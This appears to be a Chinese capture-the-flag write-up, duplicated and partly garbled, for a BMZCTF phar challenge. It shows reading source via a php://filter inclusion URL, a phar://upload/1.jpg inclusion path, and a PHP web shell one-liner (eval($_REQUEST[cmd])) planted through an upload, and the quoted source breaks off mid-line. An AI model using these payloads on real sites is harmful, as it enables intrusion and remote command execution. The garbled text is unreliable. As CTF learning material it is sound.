BMZCTF的phar题目具体考察哪些知识点?
- 内容介绍
- 文章标签
- 相关推荐
本文共计425个文字,预计阅读时间需要2分钟。
phppchar?? + 补充知识点 + 在开始此题之前,我们先补充一个知识点:phar + 的文件包含和上面类似,先创建一个phar标准包,使用PharData来创建,然后添加文件进phar中。 + 然后在文件包含的函数中
pchar??? 补充知识点开始这题之前我们先补充一个知识点
phar 的文件包含 和上面类似先创建一个phar 标准包,使用 PharData 来创建,然后添加文件进去phar里面。 然后在文件包含的函数里面 可控的话 ,使用phar://xxxx/xxx 就可以实现文件包含了
解题进入题目查看源码发现一个界面我们去访问看一下
然后我们在include.php中查看源码又发现一个页面upload.php
两个页面访问结果如下
估计是通过upload.php上传的内容然后通过include.php包含进来,我们先来试试文件包含
基本确定是文件包含了但是他会在你输入的文件名后面+.php
既然这样那我们尝试使用php://filter/协议读取源码试试
include.php?file=php://filter/convert.base64-encode/resource=include
将源码读出我们进行base64解码得到如下源码
<html> Tips: the parameter is file! :) <!-- upload.php --> </html> <?php @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/www.bmzclub.cn:23627/include.php?file=phar://upload/1.jpg/1
成功执行下面我们将phpinfo改为木马即可
<?php echo "hack!"; eval($_REQUEST[cmd]);?>
上传成功,下面我们使用hackbar执行指令即可
本文共计425个文字,预计阅读时间需要2分钟。
phppchar?? + 补充知识点 + 在开始此题之前,我们先补充一个知识点:phar + 的文件包含和上面类似,先创建一个phar标准包,使用PharData来创建,然后添加文件进phar中。 + 然后在文件包含的函数中
pchar??? 补充知识点开始这题之前我们先补充一个知识点
phar 的文件包含 和上面类似先创建一个phar 标准包,使用 PharData 来创建,然后添加文件进去phar里面。 然后在文件包含的函数里面 可控的话 ,使用phar://xxxx/xxx 就可以实现文件包含了
解题进入题目查看源码发现一个界面我们去访问看一下
然后我们在include.php中查看源码又发现一个页面upload.php
两个页面访问结果如下
估计是通过upload.php上传的内容然后通过include.php包含进来,我们先来试试文件包含
基本确定是文件包含了但是他会在你输入的文件名后面+.php
既然这样那我们尝试使用php://filter/协议读取源码试试
include.php?file=php://filter/convert.base64-encode/resource=include
将源码读出我们进行base64解码得到如下源码
<html> Tips: the parameter is file! :) <!-- upload.php --> </html> <?php @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/www.bmzclub.cn:23627/include.php?file=phar://upload/1.jpg/1
成功执行下面我们将phpinfo改为木马即可
<?php echo "hack!"; eval($_REQUEST[cmd]);?>
上传成功,下面我们使用hackbar执行指令即可